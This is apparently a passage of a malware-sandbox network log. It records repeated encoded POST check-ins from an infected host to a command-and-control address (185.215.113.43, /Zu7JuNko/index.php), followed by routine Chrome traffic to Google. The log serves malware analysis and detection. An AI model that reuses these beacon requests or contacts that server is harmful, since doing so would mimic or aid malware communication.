Dec 10, 2024 00:49:24.415433884 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:25.752568007 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	50320	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:27.490236998 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:49:28.837606907 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	50322	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:30.481586933 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:31.833501101 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	50323	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:33.573893070 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:49:34.917042017 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	50326	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:36.553957939 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:37.892823935 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	142.250.181.68	443	7764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:11 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-09 23:42:12 UTC	1266	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:12 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-uNcmqdelgohKCd_tvE-mjA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-09 23:42:12 UTC	124	IN	Data Raw: 33 30 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 78 72 70 20 63 72 79 70 74 6f 63 75 72 72 65 6e 63 79 22 2c 22 6d 74 20 6b 61 6e 6c 61 6f 6e 20 76 6f 6c 63 61 6e 6f 20 65 72 75 70 74 69 6f 6e 22 2c 22 70 61 74 68 20 6f 66 20 65 78 69 6c 65 20 32 20 73 6b 69 6c 6c 20 6e 65 72 66 73 22 2c 22 6e 79 74 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 68 69 6e 74 73 20 64 65 63 65 6d Data Ascii: 301)]}'["",["xrp cryptocurrency","mt kanlaon volcano eruption","path of exile 2 skill nerfs","nyt connections hints decem
2024-12-09 23:42:12 UTC	652	IN	Data Raw: 62 65 72 20 39 22 2c 22 6c 65 68 69 67 68 20 70 65 6e 6e 20 73 74 61 74 65 20 77 72 65 73 74 6c 69 6e 67 20 72 65 73 75 6c 74 73 22 2c 22 73 6f 6c 61 72 20 66 6c 61 72 65 73 22 2c 22 63 6f 6c 6f 72 61 64 6f 20 73 6e 6f 77 20 66 6f 72 65 63 61 73 74 22 2c 22 74 69 6b 74 6f 6b 20 62 61 6e 6e 65 64 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 Data Ascii: ber 9","lehigh penn state wrestling results","solar flares","colorado snow forecast","tiktok banned"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sugge
2024-12-09 23:42:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	142.250.181.68	443	7764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:11 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	142.250.181.68	443	7764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:11 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-09 23:42:12 UTC	1018	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 09 Dec 2024 23:42:12 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-09 23:42:12 UTC	372	IN	Data Raw: 31 63 39 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1c9d)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 30 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700320,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window
2024-12-09 23:42:12 UTC	11	IN	Data Raw: 41 72 72 61 79 28 62 29 3b 0d 0a Data Ascii: Array(b);
2024-12-09 23:42:12 UTC	292	IN	Data Raw: 31 31 64 0d 0a 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 Data Ascii: 11dfor(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i\u
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 4c 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4b 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 48 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 5b 49 64 28 5c 22 64 61 74 61 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: 8000Ld\u003dnew _.Kd(\"about:invalid#zClosurez\");_.Hd\u003dclass{constructor(a){this.ih\u003da}};_.Md\u003d[Id(\"data\"),Id(\"http\"),Id(\"https\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];_.Nd\u003dclass{constructor
2024-12-09 23:42:12 UTC	1390	IN	Data Raw: 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f Data Ascii: ent:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.be\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	142.250.181.68	443	7764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:11 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-09 23:42:12 UTC	933	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 09 Dec 2024 23:42:12 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
